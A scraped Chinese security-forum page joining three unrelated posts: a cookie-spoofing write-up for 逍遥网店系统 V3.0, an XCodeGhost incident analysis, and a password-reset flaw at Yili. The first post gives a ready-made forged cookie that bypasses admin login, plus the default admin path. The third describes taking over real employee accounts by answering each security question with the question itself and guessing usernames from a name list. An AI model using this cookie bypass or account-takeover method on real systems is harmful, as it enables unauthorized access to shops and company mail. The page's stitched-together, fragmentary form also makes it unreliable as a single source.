TOP1 神刀网络安全技术讨论区 rss漏洞信息RSS

你的位置: > 正版逍遥网店系统 V3.0 Cookies欺骗漏洞
发布日期:
发布作者:风之传说
影响版本:逍遥网店系统 V3.0
官方网站:/
漏洞类型:Cookies欺骗
漏洞描述:
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了。于是我又来到后台,看了下检测文件,悲剧由此产生:
漏洞文件:checkadmin.asp
if request.cookies("buyok")("admin")="" then response.write "&meta http-equiv='refresh' content='0;URL=../admin.asp'&"
大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。
然后我进入后台,http://127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
&!--#include file="checkadmin.asp"--&
&TITLE&网店后台管理&/TITLE&
&META http-equiv=Content-Type content="text/ charset=gb2312"&
&LINK href="manage.css" type=text/css rel=stylesheet&
&script language='javascript'&
if (top != self)top.location.href = "index.asp";
&base target="right"&
&frameset rows="25,*" framespacing="0" border="0" frameborder="0"&
&frame name="frame_top" src="top.asp" noresize&
&FRAMESET border=0 frameSpacing=0 frameBorder=0 cols=200,*&
&FRAME name="left" marginWidth=0 marginHeight=0 src="left.asp" noResize target="right" scrolling="auto"&
&FRAME name="right" marginWidth=20 marginHeight=20 src="main.asp" noResize target="right" scrolling="yes"&
&/FRAMESET&
&NOFRAMES&
&body topmargin="0" leftmargin="0"&
&p&此网页使用了框架,但您的浏览器不支持框架。&/p&
&/NOFRAMES&
&/frameset&
看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多,最后发现了一个文件。
漏洞文件:include\buyok_functions.asp
下面贴出部分代码:
set rscheck=conn.execute("select * from buyok_user where UserId='"&request.cookies("buyok")("userid")&"'")
if rscheck.eof and rscheck.bof then
response.write "&script language='javascript'&"
response.write "alert('对不起,您还没有注册或登陆。');"
response.write "location.href='javascript:history.go(-1)';"
response.write "&/script&"
response.end
看到这里大家都懂了吧 呵呵~!
利用方法:
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=
修改COOKIE 然后直接进入http://l127.0.0.1/admin/index.asp.
默认后台:http://localhost/admin/login.asp
漏洞修复:建议采用session验证.
转载请注明: &
与本文相关的文章你的位置: > 你以为这就是全部了?我们来告诉你完整的XCodeGhost事件
  这几天安全圈几乎被XCodeGhost事件刷屏,大家都非常关注,各安全团队都很给力,纷纷从不同角度分析了病毒行为、传播方式、影响面积甚至还人肉到了作者信息。拜读了所有网上公开或者半公开的分析报告后,我们认为,这还不是全部,所以我们来补充下完整的XCodeGhost事件。
  由于行文仓促,难免有诸多错漏之处,还望同行批评指正。
  事件溯源
  事情要追溯到一周前。
  9月12日,我们在跟进一个bug时发现有APP在启动、退出时会通过网络向某个域名发送异常的加密流量,行为非常可疑,于是终端安全团队立即跟进,经过一个周末加班加点的分析和追查,我们基本还原了感染方式、病毒行为、影响面。
  9月13日,产品团队发布了新版本。同时考虑到事件影响面比较广,我们立即知会了CNCERT,CNCERT也马上采取了相关措施。所以从这个时间点开始,后续的大部分安全风险都得到了控制&&可以看看这个时间点前后非法域名在全国的解析情况。
  9月14日,CNCERT发布了这个事件的预警公告。我们也更新了移动APP安全检测系统&金刚&。
  图1 CNCERT发布的预警公告
  9月16日,我们发现AppStore上的TOP5000应用有76款被感染,于是我们向苹果官方及大部分受影响的厂商同步了这一情况。
  9月17日,嗅觉敏锐的国外安全公司paloalto发现了这个问题,并发布第一版分析报告,阿里移动安全也发布了分析报告。
  接下来的事情大家都知道了,XCodeGhost事件迅速升温,成为行业热点,更多的安全团队和专家进行了深入分析,爆出了更多信息。
  被遗漏的样本行为分析
  1、在受感染的APP启动、后台、恢复、结束时上报信息至黑客控制的服务器
  上报的信息包括:APP版本、APP名称、本地语言、iOS版本、设备类型、国家码等设备信息,能精准的区分每一台iOS设备。
  上报的域名是,同时我们还发现了攻击者的其他三个尚未使用的域名。
  图2 上传机器数据的恶意代码片段
  2、黑客可以下发伪协议命令在受感染的iPhone中执行
  黑客能够通过上报的信息区分每一台iOS设备,然后如同已经上线的肉鸡一般,随时、随地、给任何人下发伪协议指令,通过iOS openURL这个API来执行。
  相信了解iOS开发的同学都知道openURL这个API的强大,黑客通过这个能力,不仅能够在受感染的iPhone中完成打开网页、发短信、打电话等常规 手机行为,甚至还可以操作具备伪协议能力的大量第三方APP。实际上,iPhone上的APP如果被感染,完全可以理解为黑客已经基本控制了你的手机!
  图3 控制执行伪协议指令的恶意代码片段
  3、黑客可以在受感染的iPhone中弹出内容由服务器控制的对话框窗口
  和远程执行指令类似,黑客也可以远程控制弹出任何对话框窗口。至于用途,将机器硬件数据上报、远程执行伪协议命令、远程弹窗这几个关键词连起来,反正我们是 能够通过这几个功能,用一点点社工和诱导的方式,在受感染的iPhone中安装企业证书APP。装APP干什么?还记得几个月之前曝光的Hacking Team的iPhone非越狱远控(RCS)吗?图4 控制远程弹窗的恶意代码片段
  4、远程控制模块协议存在漏洞,可被中间人攻击
  在进行样本分析的同时,我们还发现这个恶意模块的网络协议加密存问题,可以被轻易暴力破解。我们尝试了中间人攻击,验证确实可以代替服务器下发伪协议指令到手机,成为这些肉鸡的新主人。
  图5 存在安全漏洞的协议解密代码片段
  值得一提的是,通过追查我们发现植入的远程控制模块并不只一个版本。而现已公开的分析中,都未指出模块具备远程控制能力和自定义弹窗能力,而远程控制模块本身还存在漏洞可被中间人攻击,组合利用的威力可想而知。这个事件的危害其实被大大的低估了。
  感染途径
  分析过程中我们发现,异常流量APP都是大公司的知名产品,也是都是从AppStore下载并具有官方的数字签名,因此并不存在APP被恶意篡改的可能。随后我们把精力集中到开发人员和相关编译环境中。果然,接下来很快从开发人员的xcode中找到了答案。
  我们发现开发人员使用的xcode路径:
  Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/Library/Frameworks /CoreServices.framework/下,存在一个名为CoreServices.framework的&系统组件&,而从苹果官方下载的 xcode安装包,却不存在这些目录和&系统组件&。
  图6 被感染恶意代码的xcode包路径
  原来开发人员的xcode安装包中,被别有用心的人植入了远程控制模块,通过修改xcode编译参数,将这个恶意模块自动的部署到任何通过xcode编译的苹果APP(iOS/Mac)中。
  水落石出了,罪魁祸首是开发人员从非苹果官方渠道下载xcode开发环境。
  通 过百度搜索&xcode&出来的页面,除了指向苹果AppStore的那几个链接,其余的都是通过各种id(除了coderfun,还有使用了很多id, 如lmznet、jrl568等)在各种开发社区、人气社区、下载站发帖,最终全链到了不同id的百度云盘上。为了验证,团队小伙伴们下载了近20个各版 本的xcode安装包,发现居然无一例外的都被植入了恶意的CoreServices.framework,可见投放这些帖子的黑客对SEO也有相当的了 解。
  图7 XCodeGhost作者在知名论坛上发布xcode的下载帖
  进一步来看,攻击者做到的效果是只要是通过搜索引擎下载xcode,都会下载到他们的XCodeGHost,还真的做到了幽灵一样的存在。
  影响面
  在清楚危害和传播途径后,我们意识到在如此高级的攻击手法下,被感染的可能不只一个两个APP,于是我们马上对AppStore上的APP进行检测。
  最后我们发现AppStore下载量最高的5000个APP中有76款APP被XCodeGhost感染,其中不乏大公司的知名应用,也有不少金融类应用,还有诸多民生类应用。根据保守估计,受这次事件影响的用户数超过一亿。
  经过这一事件后,开发小伙伴们纷纷表示以后只敢下官方安装包,还要MD5和SHA1双校验。而这个事件本身所带来的思考,远不止改变不安全的下载习惯这么简单。
  经过这两年若干次攻击手法的洗礼后,我们更加清醒的意识到,黑产从业者早已不是单兵作战的脚本小子,而是能力全面的黑客团队。
  总结来看,移动互联网安全之路任重道远。当然,这里的危机也是安全行业的机遇。
转载请注明: &
与本文相关的文章你的位置: > 人类惰性之伊利集团重要系统用户密码重置漏洞(秒改/奇葩设计)
伊利的电子邮件系统
发现验证的答案特别奇葩
不知道是这个系统设计找回密码时的验证问题和答案就是一样的,还是运维图方便,怕大家忘记,要求大家都这么做的,又试了几个,全都可以重置成功,均是验证答案填写和问题一样
同样是答案和问题一样
邮箱名可用中国姓名top500那个做成的字典
就这样就可以秒改伊利核心用户密码了…
漏洞证明:
转载请注明: &
与本文相关的文章

我要回帖

更多关于 dv rss.asp 漏洞 的文章

 

随机推荐